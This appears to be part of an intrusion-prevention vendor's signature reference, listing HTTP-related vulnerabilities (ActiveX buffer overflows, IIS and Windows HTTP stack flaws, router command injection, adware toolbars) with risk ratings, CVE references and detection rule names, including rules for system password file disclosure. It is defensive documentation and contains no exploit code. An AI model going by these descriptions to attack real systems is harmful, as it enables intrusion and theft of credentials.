HTTP_HP-OpenView-Network-Node-Manager-Cgi-Application-Buffer-Overflow

About this vulnerability:

A vulnerability in HP OpenView Network Node Manager

Risk:

High

First detected in:

sgpkg-ips-141-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP OpenView Network Node Manager

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in HP OpenView Network Node Manager. The flaw is due to boundary error in Common Gateway Interface (CGI) applications when processing overly long parameters submitted in HTTP requests. A remote unauthenticated attacker can send a crafted HTTP request to the target host to exploit this vulnerability. Successful attack could allow for arbitrary code being injected and executed with the privileges of the affected service, which is normally the Internet Guest Account on Windows platforms.

Situation:

HTTP_CSU-HP-OpenView-Network-Node-Manager-Cgi-Application-Buffer-Overflow

References:

CVE-2007-6204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6204

BID-26741
http://www.securityfocus.com/bid/26741

HTTP_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite

About this vulnerability:

A vulnerability in HP RulesEngine.dll ActiveX CTL

Risk:

High

First detected in:

sgpkg-ips-137-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

HP Software Update

Type:

Input Validation

Description:

An arbitrary file overwrite vulnerability exists in the HP Software Update, shipped with many HP systems. The vulnerability is due to a design weakness in an ActiveX component that is used to download patches and updates for the HP software. A remote attacker may persuade the target user to open a malicious web page to overwrite sensitive files on the local system's file system and potentially corrupt the operating system, and/or execute arbitrary code on the vulnerable system with privileges of logged in user.

Situation:

HTTP_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite
File-Text_HP-Software-Update-Tool-ActiveX-Control-File-Overwrite

References:

CVE-2007-6506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6506

BID-26950
http://www.securityfocus.com/bid/26950

HTTP_IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow

About this vulnerability:

Stack-based buffer overflow vulnerability in IBM Access Support ActiveX control

Risk:

Moderate

First detected in:

sgpkg-ips-216-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IBM Access Support ActiveX Control

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in the IBM Access Support ActiveX control. The vulnerability is due to insufficient input validation in the GetXMLValue() method of the IBM Access Support ActiveX control. A remote attacker can exploit this vulnerability by enticing the user to open a crafted HTML file. In an attack where code injection is successful, the behavior of the target is entirely dependent on the intended function of the injected code. The code is executed in the security context of the logged in user. In an attack where code injection is not successful, Internet Explorer terminates abnormally.

Situation:

HTTP_SS-IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow
File-Text_IBM-Access-Support-ActiveX-Getxmlvalue-Method-Buffer-Overflow

References:

CVE-2009-0215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0215

BID-34228
http://www.securityfocus.com/bid/34228

OSVDB-52958
http://www.osvdb.org/52958

HTTP_IIS-Exair-DoS

About this vulnerability:

IIS ExAir sample page Denial of Service

Risk:

Moderate

First detected in:

sgpkg-ips-7-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS 4.0

Type:

Insecure Configuration

Description:

The IIS ExAir sample pages contain a denial of service vulnerability that can be exploited if these sample pages are available on the Web server. IIS hangs if the related ExAir DLLs are not running when one of the following sample pages is requested: root/search/advsearch.asp, root/search/query.asp or root/search/search.asp.

Situation:

HTTP_CRL-IIS-Exair-DoS

References:

CVE-1999-0449
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449

BID-193
http://www.securityfocus.com/bid/193

OSVDB-4
http://www.osvdb.org/4

OSVDB-3
http://www.osvdb.org/3

OSVDB-2
http://www.osvdb.org/2

HTTP_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The flaw is due to improper handling of certain COM objects that are not designed to work with Internet Explorer. By persuading a user to visit a malicious web site, a remote attacker may execute arbitrary code on the target system with the privileges of the currently logged in user.

Situation:

HTTP_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption
File-Text_Internet-Explorer-Imjpcksid.dll-Com-Object-Memory-Corruption

References:

CVE-2006-4697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4697

BID-22486
http://www.securityfocus.com/bid/22486

OSVDB-31891
http://www.osvdb.org/31891

MS07-016
http://technet.microsoft.com/security/bulletin/MS07-016

HTTP_Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a vulnerability in the way Microsoft Internet Explorer instantiates certain COM objects that are not designed to be used as ActiveX controls. When instantiation of such COM objects is attempted by Internet Explorer, the application memory can be corrupted as a result. Successful exploitation of this vulnerability can allow for arbitrary code execution within the security context of the currently logged in user.

Situation:

HTTP_SS-Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption
File-Text_Internet-Explorer-Multiple-Com-Objects-Instantiation-Memory-Corruption

References:

CVE-2007-0219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0219

BID-22504
http://www.securityfocus.com/bid/22504

OSVDB-31895
http://www.osvdb.org/31895

OSVDB-31894
http://www.osvdb.org/31894

OSVDB-31893
http://www.osvdb.org/31893

MS07-016
http://technet.microsoft.com/security/bulletin/MS07-016

HTTP_Macrovision-InstallShield-Update-Service-Isusweb.dll-Remote-Buffer-Overflow

About this vulnerability:

A vulnerability in Macrovision Update Service

Risk:

High

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Macrovision Update Service; Macrovision FLEXnet Connect; Macrovision InstallShield

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Macrovision InstallShield Update Service ActiveX control implemented in isusweb.dll. The vulnerability is due to a boundary error while processing calls to the DownloadAndExecute method of the said ActiveX control. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious webpage, potentially allowing arbitrary code to be injected and executed in the security context of the currently logged in user.s

Situation:

HTTP_Macrovision-InstallShield-Update-Service-Isusweb.dll-Remote-Buffer-Overflow
File-Text_Macrovision-InstallShield-Update-Service-Isusweb.dll-Buffer-Overflow

References:

CVE-2007-6654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6654

BID-27013
http://www.securityfocus.com/bid/27013

OSVDB-39980
http://www.osvdb.org/39980

HTTP_Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Microsoft Agent

Risk:

High

First detected in:

sgpkg-ips-121-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000

Software:

Microsoft Agent

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Microsoft Windows Agent application. The flaw is due to wrongly copying an overly large string to a fixed-size stack buffer within the code of the agentdpv.dll Dynamic Link Library. By persuading the target user to open a malicious web page, an attacker may execute arbitrary code on the target system within the privileges of the currently logged-on user.

Situation:

HTTP_SS-Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow
File-Text_Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow

References:

CVE-2007-3040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3040

BID-25566
http://www.securityfocus.com/bid/25566

OSVDB-36934
http://www.osvdb.org/36934

MS07-051
http://technet.microsoft.com/security/bulletin/MS07-051

HTTP_Microsoft-HTTP-Services-Authentication-Reflection

About this vulnerability:

Authentication bypass vulnerability in Microsoft HTTP Services

Risk:

Moderate

First detected in:

sgpkg-ips-217-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a vulnerability in Microsoft HTTP Services which allows remote attackers to bypass SMB NTLM authentication by tricking the victim into connecting to an attacker-controlled HTTP server. The vulnerability allows a remote attacker to connect to the victims host via SMB with the victims privileges by reflecting the victims NTLM authentication over HTTP back to the victims SMB service.

Situation:

Analyzer_HTTP-Services-Authentication-Reflection
HTTP_CSH-NTLM-Authentication-Usage
HTTP_SHS-NTLM-Authentication-Usage
SMB-TCP_CHS-NTLM-Authentication-Usage

References:

CVE-2009-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0550

BID-34439
http://www.securityfocus.com/bid/34439

OSVDB-53619
http://www.osvdb.org/53619

MS09-013
http://technet.microsoft.com/security/bulletin/MS09-013

HTTP_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption

About this vulnerability:

Microsoft Internet Explorer Marquee Object Handling Memory Corruption

Risk:

High

First detected in:

sgpkg-ips-217-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Code Injection

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles Marquee objects. Remote attackers can exploit this vulnerability by enticing target users to open a crafted web page. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behavior of the target depends on the intention of the attacker. Any injected code is executed in the security context of the currently logged in user. In an unsuccessful code execution attack, Internet Explorer may terminate abnormally.

Situation:

HTTP_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption

References:

CVE-2009-0554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0554

BID-34426
http://www.securityfocus.com/bid/34426

MS09-014
http://technet.microsoft.com/security/bulletin/MS09-014

HTTP_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption

About this vulnerability:

Vulnerability in onunload event handling in Microsoft Internet Explorer

Risk:

Low

First detected in:

sgpkg-ips-98-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to an unspecified error while handling crafted JavaScript code that uses the onunload event. A remote attacker may exploit the vulnerability to cause a denial of service.

Situation:

HTTP_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-onUnload-Event-Memory-Corruption

References:

CVE-2007-1094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1094

BID-22678
http://www.securityfocus.com/bid/22678

OSVDB-45248
http://www.osvdb.org/45248

HTTP_Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Microsoft SQL Server

Risk:

High

First detected in:

sgpkg-ips-124-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft SQL Server 2005

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Distributed Management Objects component of Microsoft SQL Server. The vulnerability is due to a boundary error while handling an overly large argument passed to a vulnerable method of the Distributed Management Objects library, sqldmo.dll. A remote attacker could exploit the vulnerability by enticing the target user to open a malicious web page. Successful exploitation would cause a buffer overflow condition which may lead to arbitrary code injection and execution in the security context of the currently logged-in user.

Situation:

HTTP_SS-Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow
File-Text_Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow

References:

CVE-2007-4814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4814

BID-25594
http://www.securityfocus.com/bid/25594

OSVDB-38399
http://www.osvdb.org/38399

HTTP_Microsoft-Visual-Basic-6.0-Project-File-Handling-BOF

About this vulnerability:

A buffer overflow vulnerability in Microsoft Visual Basic

Risk:

High

First detected in:

sgpkg-ips-122-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual Basic; Microsoft Visual Studio

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Visual Basic. The flaw is due to improper boundary protection when processing .VBP files. An attacker can leverage this vulnerability by enticing the target user to open a crafted .VBP file, potentially causing arbitrary code to be injected and executed in the security context of the current logged in user.

Situation:

HTTP_Microsoft-Visual-Basic-6.0-Vbp-Project-File-Handling-BOF
File-TextId_Microsoft-Visual-Basic-6.0-Vbp-Project-File-Handling-BOF

References:

CVE-2007-4776
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4776

BID-25629
http://www.securityfocus.com/bid/25629

OSVDB-36936
http://www.osvdb.org/36936

HTTP_Microsoft-Visual-Foxpro-Vfp6r.dll-Docmd-ActiveX-Control-Command-Execution

About this vulnerability:

A vulnerability in Microsoft Visual FoxPro ActiveX control

Risk:

High

First detected in:

sgpkg-ips-138-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Visual FoxPro; Microsoft Visual Studio

Type:

Malfunction

Description:

There exists an access control weakness vulnerability in the way Microsoft Visual FoxPro ActiveX Control handles user supplied data. The vulnerability is a result of insufficient data validation while processing the DoCmd method call from a webpage script. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious webpage, potentially allowing arbitrary code to be executed in the security context of the currently logged-in user.

Situation:

HTTP_Microsoft-Visual-Foxpro-Vfp6r.dll-Docmd-ActiveX-Control-Command-Execution
File-Text_Microsoft-Visual-Foxpro-Vfp6r-Docmd-ActiveX-Control-Command-Execution

References:

CVE-2008-0236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0236

BID-27205
http://www.securityfocus.com/bid/27205

HTTP_MS09-036

About this vulnerability:

MS09-036

Risk:

Low

First detected in:

sgpkg-ips-238-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

IIS

Type:

Malfunction

Description:

This is not a vulnerability.

Situation:

HTTP_CSU-MS09-036

References:

MS09-036
http://technet.microsoft.com/security/bulletin/MS09-036

HTTP_Oracle-Bea-WebLogic-IIS-Connector-Jsessionid-Stack-Buffer-Overflow

About this vulnerability:

Oracle BEA WebLogic Server JSession Stack Buffer Overflow

Risk:

Moderate

First detected in:

sgpkg-ips-216-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Oracle BEA WebLogic

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the BEA WebLogic Server IIS connector. The vulnerability is due to a boundary error in the IIS connector. A remote unauthenticated attacker can exploit this vulnerability by sending crafted HTTP requests to the target host. In an attack where code injection is successful, the behavior of the target depends on the intended function of the injected code. The injected code in such a case executes in the security context of the IIS service. In an attack where code injection is not successful, the affected process terminates abnormally.

Situation:

HTTP_CRL-Oracle-Bea-WebLogic-IIS-Connector-Jsessionid-Stack-Buffer-Overflow

References:

CVE-2008-5457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5457

BID-33177
http://www.securityfocus.com/bid/33177

HTTP_Pacific-Poker

About this vulnerability:	Pacific Poker
Risk:	Low
First detected in:	sgpkg-ips-224-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Pacific Poker
Type:	Misconfiguration
Description:	Pacific Poker is a online poker game which may show advertisments. Some organizations may consider the Pacific Poker software unwanted.
Situation:	HTTP_CS-Pacific-Poker-Login

HTTP_Php-Strip-Tags-Bypass-Vulnerability

About this vulnerability:

Poison NULL byte vulnerability in PHP

Risk:

High

First detected in:

sgpkg-ips-141-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

PHP

Type:

Metacharacter Injection

Description:

A vulnerability exists in the HTML tag filtering method of PHP. PHP does not properly filter tags containing a null byte, allowing potentially unsafe tags to be passed on to further prosessing. This vulnerability allows an attacker to inject malicious script and use the vulnerable PHP in a cross-site scripting attack.

Situation:

HTTP_CSU-Php-Poison-Null-Byte-Strip-Tags-Bypass

References:

CVE-2004-0595
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0595

BID-10724
http://www.securityfocus.com/bid/10724

HTTP_Platrium-Weather-Service

About this vulnerability:	Zango Platrium online games and weather software
Risk:	Low
First detected in:	sgpkg-ips-224-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Platrium
Type:	Misconfiguration
Description:	Platrium is a wearher service that may show desktop advertisements. Some organizations may consider the platrium software unwanted.
Situation:	HTTP_CSH-Platrium-Weather-Service-User-Agent HTTP_CSH-Platrium-Weather-Service-Cookie

HTTP_PopCap-Games

About this vulnerability:	PopCap Game activity
Risk:	Low
First detected in:	sgpkg-ips-224-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	PopCap
Type:	Misconfiguration
Description:	PopCap games are casual online games and may display advertisments. Some organizations may consider PopCap unwanted.
Situation:	HTTP_CSH-PopCap-UserAgent

HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2021-31166

About this vulnerability:

A vulnerability in HTTP protocol stack

Risk:

High

First detected in:

sgpkg-ips-1347-5242

Last changed:

sgpkg-ips-1347-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in HTTP stack of Microsoft Windows. Successful exploitation of this issue can result in remote code execution.

Situation:

HTTP_CRH-HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2021-31166

References:

CVE-2021-31166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31166

ms21-may
http://technet.microsoft.com/security/bulletin/ms21-may

HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2022-21907

About this vulnerability:

A vulnerability in HTTP protocol stack

Risk:

High

First detected in:

sgpkg-ips-1429-5242

Last changed:

sgpkg-ips-1461-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in HTTP stack of Microsoft Windows. Successful exploitation of this issue can result in remote code execution.

Situation:

HTTP_CS-HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2022-21907
HTTP_CRH-HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2021-31166
HTTP_CRH-Microsoft-IIS-HTTP-Protocol-Stack-Remote-Code-Execution

References:

CVE-2022-21907
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907

ms22-jan
http://technet.microsoft.com/security/bulletin/ms22-jan

HTTP_Request-TRACE-2

About this vulnerability:	The HTTP request method TRACE was seen in an HTTP request.
Risk:	Moderate
First detected in:	sgpkg-ips-394-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	The TRACE method is not used by most common WWW browsers or other HTTP clients. The TRACE method is seen when the HTTP request is made with uncommon tools, or with a script running on the client's browser. It is not possible to determine if the the client or server is involved in some form of information gathering attack based on the use of the TRACE method, but it is reasonable to assume so.
Situation:	HTTP_CS-HTTP_Request-TRACE-2

HTTP_Response_Splitting

About this vulnerability:

Multiple Vendor HTTP response splitting vulnerability

Risk:

Low

First detected in:

sgpkg-ips-12-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic HTTP server; Generic proxy; Generic HTTP client

Type:

Malfunction

Description:

An attacker may be able to poison a server, proxy, or browser cache, or hijack pages that contain user specific information. This vulnerability can be exploited by injecting variations of CRLF sequences into HTTP response headers that the attacker can control or influence.

Situation:

HTTP_CSU-Response-Splitting

References:

BID-9804
http://www.securityfocus.com/bid/9804

HTTP_SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow

About this vulnerability:

Stack-based buffer overflow vulnerability in SAP AG GUI for Windows

Risk:

Moderate

First detected in:

sgpkg-ips-216-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SAP GUI

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in the SAP GUI EAI WebViewer3D ActiveX control. The vulnerability is due to a boundary error in the implementation of a function exposed by the control. A remote attacker can exploit this vulnerability by enticing the user to open a crafted HTML file. In an attack where code injection is successful, the behavior of the target depends on the intended function of the injected code. The code is executed in the security context of the logged in user. In an attack where code injection is not successful, Internet Explorer terminates abnormally.

Situation:

HTTP_SS-SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow
File-Text_SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow

References:

CVE-2007-4475
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4475

BID-34310
http://www.securityfocus.com/bid/34310

HTTP_SS-Adobe-Flash-ActiveX-Buffer-Overflow

About this vulnerability:

Adobe Flash ActiveX Buffer Overflow

Risk:

Moderate

First detected in:

sgpkg-ips-132-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Buffer Overflow

Description:

There is a vulnerability in certain versions of the Adobe ActiveX Flash player. The vulnerability can be exploited by luring the target user to a hostile web server that can trigger and exploit the vulnerability. Successful exploitation leads to remote compromise of the client host, allowing the attacker to install bots or other malware on the client system.

Situation:

HTTP_SS-Adobe-Flash-ActiveX-Buffer-Overflow
File-Text_Adobe-Flash-ActiveX-Buffer-Overflow

References:

CVE-2002-0605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0605

BID-4664
http://www.securityfocus.com/bid/4664

OSVDB-5177
http://www.osvdb.org/5177

HTTP_SS-Microsoft-Internet-Explorer-CSS-Strings-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-142-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a remote code execution vulnerability in Microsoft Internet Explorer. The flaw is caused by improper handling of malformed Cascading Style Sheet (CSS) content. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-CSS-Strings-Parsing-Memory-Corruption

References:

CVE-2007-0943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0943

BID-25288
http://www.securityfocus.com/bid/25288

OSVDB-36397
http://www.osvdb.org/36397

MS07-045
http://technet.microsoft.com/security/bulletin/MS07-045

HTTP_Starware

About this vulnerability:	Starware toolbar
Risk:	Low
First detected in:	sgpkg-ips-224-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Starware
Type:	Misconfiguration
Description:	Starware is a toolbar for Internet Explorer and it may show desktop advertisments. Some organizations may consider the starware toolbar unwanted.
Situation:	HTTP_CSU-Starware-Toolbar-Update

HTTP_Sun-Java-Web-Start-Jnlp-File-Argument-Injection

About this vulnerability:

A vulnerability in Sun Microsystems JRE

Risk:

Moderate

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sun Java Runtime Environment

Type:

Input Validation

Description:

There is a vulnerability in the way Sun Java Web Start isolates Java applications from the host system. A Java Web Start configuration file (JNLP) can be crafted to inject command-line arguments into the vulnerable Web Start virtual machine application. An attacker can exploit this vulnerability to bypass security restrictions and perform privileged operations on a target system.

Situation:

HTTP_Java-Web-Start-Jnlp-File-Argument-Injection
File-TextId_Java-Web-Start-Jnlp-File-Argument-Injection

References:

CVE-2005-0836
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0836

BID-12847
http://www.securityfocus.com/bid/12847

HTTP_SupportSoft-Products-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in SupportSoft ActiveX control

Risk:

High

First detected in:

sgpkg-ips-98-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SupportSoft Products; Symantec Norton AntiVirus; Symantec Norton Internet Security; Symantec Norton System Works

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the SupportSoft ActiveX Controls. The flaw is due to the lack of proper boundary checks on the user-supplied data to the vulnerable ActiveX control ScriptRunner. Successful exploitation of this vulnerability can allow for arbitrary code execution within the security context of the currently logged in user.

Situation:

HTTP_SS-SupportSoft-Products-ActiveX-Control-Buffer-Overflow
File-Text_SupportSoft-Products-ActiveX-Control-Buffer-Overflow

References:

CVE-2006-6490
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6490

BID-22564
http://www.securityfocus.com/bid/22564

OSVDB-33482
http://www.osvdb.org/33482

OSVDB-33481
http://www.osvdb.org/33481

HTTP_System-File-Access

About this vulnerability:	System file access
Risk:	Moderate
First detected in:	sgpkg-ips-180-2032
Last changed:	sgpkg-ips-1639-5242
Platform:	Any Operating System
Software:	<os>
Type:	Malfunction
Description:	Operating systems and server applications contain files that may provide sensible information to attackers. If an attacker gets these files, it may allow the attacker to launch further attacks possibly leading into a system compromise. Usually these sensible system files are not available or shared by defualt, but a disclosure type of attack is required.
Situation:	Shared_CS-System-Password-File-Transfer Shared_SS-System-Password-File-Transfer Shared-UDP_System-Password-File-Transfer HTTP_CSU-Potential-System-File-Disclosure HTTP_CSU-Suspected-System-File-Disclosure HTTP_CSU-System-File-Disclosure

HTTP_Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Trend Micro OfficeScan Corporate Edition

Risk:

High

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trend Micro OfficeScan Corporate Edition

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Trend Micro OfficeScan Client ActiveX control. The flaw is due to a lack of proper boundary checks on the user-supplied data to the vulnerable ActiveX control, OfficeScanSetupINICtrl. Successful exploitation of this vulnerability can allow arbitrary code execution within the security context of the currently logged in user.

Situation:

HTTP_SS-Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow
File-Text_Trend-Micro-OfficeScan-Client-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-0325
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0325

BID-22585
http://www.securityfocus.com/bid/22585

OSVDB-33040
http://www.osvdb.org/33040

HTTP_Wholesale-Directory-Toolbar

About this vulnerability:	Wholesale Directory Toolbar
Risk:	Low
First detected in:	sgpkg-ips-224-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Wholesale Directory Toolbar
Type:	Misconfiguration
Description:	Wholesale Directory Toolbar is a toolbar for internet explorer. It may report browsing habits to third parties. Some organizations may consider the Wholesale Directory Toolbar software unwanted.
Situation:	HTTP_CSH-Wholesale-Directory-Toolbar

HTTP_Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A vulnerability in Yahoo! Music Jukebox

Risk:

High

First detected in:

sgpkg-ips-141-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Yahoo! Music Jukebox

Type:

Buffer Overflow

Description:

Multiple buffer overflow vulnerabilities exist in Yahoo! Music Jukebox. These vulnerabilities are caused due to boundary errors within the Yahoo! Music Jukebox ActiveX Control. A remote attack can exploit these vulnerabilities by enticing the target user to open a crafted webpage, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow
File-Text_Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow

References:

CVE-2008-0625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0625

BID-27578
http://www.securityfocus.com/bid/27578

HTTP_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow

About this vulnerability:

ActiveX Control buffer overflow in Yahoo! Toolbar

Risk:

High

First detected in:

sgpkg-ips-137-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Yahoo! Toolbar; Yahoo! Widgets; Yahoo Messenger

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Yahoo! Toolbar. The vulnerability is caused due to boundary errors within the YShortcut ActiveX control component of Yahoo! Toolbar. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted webpage, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow
File-Text_Yahoo!-Toolbar-Url-Shortcut-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-6535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6535

BID-26956
http://www.securityfocus.com/bid/26956

HTTP_Zango-Toolbar

About this vulnerability:	Zango Toolbar
Risk:	Low
First detected in:	sgpkg-ips-224-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Zango
Type:	Misconfiguration
Description:	Zango is a toolbar and weather service that may show advertisements. Some organizations may consider the zango software unwanted.
Situation:	HTTP_CSH-Zango-Toolbar

Huawei-HG532n-Command-Injection

About this vulnerability:	A Huawei HG532n Command Injection vulnerability
Risk:	High
First detected in:	sgpkg-ips-1014-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Huawei HG532n Routers
Type:	Insecure Configuration
Description:	A vulnerability in Huawei HG532n Routers which allows remote attackers to gain a root shell through command injection.
Situation:	HTTP_CRL-Huawei-HG532n-Command-Injection

Huawei-HG866-Authentication-Bypass

About this vulnerability:	A vulnerability in Huawei HG866 routers
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Huawei HG866 routers
Type:	Malfunction
Description:	There is an authentication bypass vulnerability in Huawei HG866 routers wihch allows remote attackers to change the web interface administrator password wihtout authentication.
